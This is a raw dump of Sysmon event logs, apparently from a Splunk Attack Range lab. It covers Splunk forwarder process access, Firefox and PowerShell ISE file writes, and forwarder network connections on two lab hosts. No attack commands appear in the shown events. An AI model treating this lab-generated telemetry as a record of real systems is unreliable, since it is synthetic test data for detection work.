Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-F4D5-60EB-3E7D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.161{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=708C99A19525AE00AB829C31DDC9C8BA,SHA256=BDE09E9FA7B4C2F9C041081261DF76EB52AE9AC7E72D553DDC65B9782468300A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:54.775{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ACB97BA82BAE42FD3A20B131DB40868,SHA256=8475B9FA129F2D7322B960A2C91B0C8DCD13ABFBE8A08F6DD7DBB0D613D56C24,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D6-60EB-3F7D-00000000CF01}7864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F4D6-60EB-3F7D-00000000CF01}7864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.360{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D6-60EB-3F7D-00000000CF01}7864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.361{466BC892-F4D6-60EB-3F7D-00000000CF01}7864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.164{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F189BB245F1577D0805DAE64A59AD7,SHA256=B8E56831B122236990BC3864F09AE06DFCC3611A930C92EDA448F6FED31554BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:55.791{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DEA6226BF8216767D2FCA350213A262,SHA256=40257ED103874028B472FC69C63B782AE7E796A74779ABB5E8850CCA0C4B8CC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.363{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DBB59084EA66160E6B33EBA7B11058DE,SHA256=FDC1CECACF33C4AF2F89C147B48FC217BF72C5CE49A1A3AD31459D54635965A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.225{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A12799433F6E55C9954818E56C162A8E,SHA256=B8AF50D26ED7BCBF65FCE9154BA6D66B90949F32A6B5975D4994E25DA8D3B012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.225{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A0F61F619B51637C2361AF1A9B02DA2F,SHA256=9180B8D95129CD8C7D3851505D4D216EAFBCC32D11AE83EF4EF184F6B06EF907,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7FCE117E723FE4FF2AC14476DF967D40,SHA256=1C08099191B7643FB4F27F710E80291D94DC805767D6C03DCAA0CA6AD11C8066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=68F0D0884B87F5646C64D72A0DC0B642,SHA256=CEAF35C5B21ACA789EC1F26812257C3E2A22BB7BBC1761C804E3D50BF5F02328,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=98150A96FDE3CD501B715CC9BA7C4980,SHA256=5FD9BD773D20B8AEA0658A579449ACD86A81BEDEFC7A39619578A8870FF59F34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7D35C5264AA3E8636475655F58E2DB5E,SHA256=62853360D6E53C4BA67DDF762F9371C70892B1A6F6A0C4C8F4859D92B0E0933C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F8B0C0ADA99853F8F0A380476344D2A0,SHA256=880266F48C3EBAA5F9F436D4113D6441CBC81AC3B2D0A2A9C012FC0CE1449442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8FE6ED969399119C77F1CB285EA64C0A,SHA256=4482FAAF18C733155BB87DB604A836D25FDC68D5A0D01247585348DFCC108ABA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E04DBE4DC49266722081F3A1DB8BCDE1,SHA256=CF5191329D4A3E930E98670C05236F23E16D964715887A3A8285F1302229262F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2C8FB8458864FA89B940F184D5663F9C,SHA256=82DF1A8C5256F0BF929548196352FD9916CC4361A850E7035D2833D8F38E9537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BE0E2683BD54C004BA8625C360E57D0C,SHA256=1382E32A185DCA9DBAD48C7AA998388B25FAE73989438CBBF78AE253D2C0438F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.179{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=418F6EF44BD4588AF2C7F2293B823B78,SHA256=4F761DE092C2D1FDBA92C8C62E5FB73F212D35E16F3C9203BD66695E33710165,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:56.806{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AE87C8E834B8B7D4FE985869B8E35CF,SHA256=920F278E27653204AB18891BFF77849CEFCC3241997F01A914A224CE1F8D95C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:56.994{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:56.195{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=530C6E270D9FDDB297E69C56AAA25C67,SHA256=77FEC44681C226F6623A441B5E7208D84092E8D7A6ED5A0E80942E8C9E9F3345,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:56.204{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57272-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:57.822{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A81171DA07D82F78692F66E3EBB75931,SHA256=E6FBB560B70675D3CE2BEBD504B26CA4E7A564A70CC3B64D0A69E0C9E833E200,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:57.209{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22708D8BDEB7029BE2F861403D112F60,SHA256=CAB3211A15A640A82CE54581C4E66A16622E9714A1FDECEBB9A54A24A1FD1D29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:58.822{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51F5606674F2A098A1112938B6C3C173,SHA256=42E2905D6033A5147912EF2F2D11C1F5FEBE218DECC0F64CCF49EADC70F8E4E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:58.224{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0236D501CEAB14921969B4746F9DC21,SHA256=3F755FC367CC76D77882778B24CF6588F4CCCC08C70683E515718D54068AD9A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:58.145{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf69f1ae.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:49.738{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51032-false10.0.1.12-8000- 23542300x8000000000000000807680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:59.837{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99968ADA7C35E009BABE19BD4D2BD249,SHA256=9D09A56FDA55963C67C1B18B0E6E3EA1251EEEC321BA22DEF5CE963FC37183DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.224{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E08BC1F9F2F40FAE3A0F01A6FD5AAC,SHA256=EBD0F10D5A70E2AF0A3F9FCB2DD061C7A35596E2779FB02BCBBE5BC3AD323760,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.521{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51033-false10.0.1.12-8089- 10341000x80000000000000001049100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.045{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.045{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.045{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 